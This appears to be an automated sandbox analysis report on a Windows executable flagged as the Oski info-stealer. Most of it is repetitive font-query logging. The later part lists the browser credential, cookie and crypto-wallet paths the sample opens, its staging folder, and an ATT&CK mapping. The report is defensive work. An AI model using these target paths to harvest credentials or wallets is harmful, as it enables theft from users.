Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\ProgramData\734573140483756\autofill\Google Chrome_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\ProgramData\734573140483756\cc\Google Chrome_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\ProgramData\734573140483756\cookies\Google Chrome_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\ProgramData\734573140483756\outlook.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\ProgramData\734573140483756\passwords.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\ProgramData\734573140483756\screenshot.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\ProgramData\734573140483756\system.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\buIKlB688e.exe

Code function: GetProcessHeap,HeapAlloc,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,_memset,LocalFree,

5_2_0041AA60

Source: C:\Users\user\Desktop\buIKlB688e.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\buIKlB688e.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\buIKlB688e.exe

Code function: 5_2_00416D00 SetFilePointer,SetFilePointer,GetLocalTime,SystemTimeToFileTime,

5_2_00416D00

Source: C:\Users\user\Desktop\buIKlB688e.exe

Code function: 5_2_0040D6E2 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,

5_2_0040D6E2

Source: C:\Users\user\Desktop\buIKlB688e.exe

Code function: 5_2_0041BEE0 _memset,_memset,GetVersionExA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,WideCharToMultiByte,_fprintf,_fprintf,_fprintf,_fprintf,WideCharToMultiByte,_fprintf,_fprintf,WideCharToMultiByte,_fprintf,_fprintf,_fprintf,_fprintf,WideCharToMultiByte,_fprintf,_fprintf,WideCharToMultiByte,WideCharToMultiByte,_fprintf,_fprintf,_fprintf,_fprintf,WideCharToMultiByte,_fprintf,_fprintf,WideCharToMultiByte,_fprintf,_fprintf,_fprintf,_fprintf,WideCharToMultiByte,_fprintf,_fprintf,FreeLibrary,

5_2_0041BEE0

Source: C:\Users\user\Desktop\buIKlB688e.exe

Code function: 5_2_0041B1E0 GetUserNameA,

5_2_0041B1E0

Stealing of Sensitive Information:

Yara detected Oski Stealer

Show sources

Source: Yara match	File source: 0.2.buIKlB688e.exe.4038f60.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.buIKlB688e.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.buIKlB688e.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.buIKlB688e.exe.4038f60.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.372435163.0000000003E39000.00000004.00000001.sdmp, type: MEMORY

Tries to steal Crypto Currency Wallets

Show sources

Source: C:\Users\user\Desktop\buIKlB688e.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior

Found many strings related to Crypto-Wallets (likely being stolen)

Show sources

Source: buIKlB688e.exe, 00000005.00000002.389588440.0000000000F3F000.00000004.00000020.sdmp	String found in binary or memory: C:\ProgramData\734573140483756\crypto\Electrumv-O
Source: buIKlB688e.exe, 00000005.00000002.389459008.0000000000EBE000.00000004.00000020.sdmp	String found in binary or memory: ElectronCash
Source: buIKlB688e.exe, 00000005.00000002.389920623.0000000003920000.00000004.00000001.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: buIKlB688e.exe, 00000005.00000002.389588440.0000000000F3F000.00000004.00000020.sdmp	String found in binary or memory: C:\ProgramData\734573140483756\crypto\Exodus
Source: buIKlB688e.exe, 00000005.00000002.389588440.0000000000F3F000.00000004.00000020.sdmp	String found in binary or memory: Ethereum
Source: buIKlB688e.exe, 00000005.00000002.389588440.0000000000F3F000.00000004.00000020.sdmp	String found in binary or memory: MultiDoge
Source: buIKlB688e.exe, 00000000.00000002.378147940.0000000007410000.00000004.00020000.sdmp	String found in binary or memory: set_UseMachineKeyStore

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\buIKlB688e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior

Source: Yara match

File source: Process Memory Space: buIKlB688e.exe PID: 5364, type: MEMORYSTR

Remote Access Functionality:

Yara detected Oski Stealer

Show sources

Source: Yara match	File source: 0.2.buIKlB688e.exe.4038f60.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.buIKlB688e.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.buIKlB688e.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.buIKlB688e.exe.4038f60.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.372435163.0000000003E39000.00000004.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation1	Application Shimming1	Application Shimming1	Disable or Modify Tools11	OS Credential Dumping1	System Time Discovery2	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Data Obfuscation2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Process Injection11	Deobfuscate/Decode Files or Information1	Input Capture1	Account Discovery1	Remote Desktop Protocol	Data from Local System3	Exfiltration Over Bluetooth	Ingress Tool Transfer11	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information4	Security Account Manager	File and Directory Discovery3	SMB/Windows Admin Shares	Input Capture1	Automated Exfiltration	Encrypted Channel2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
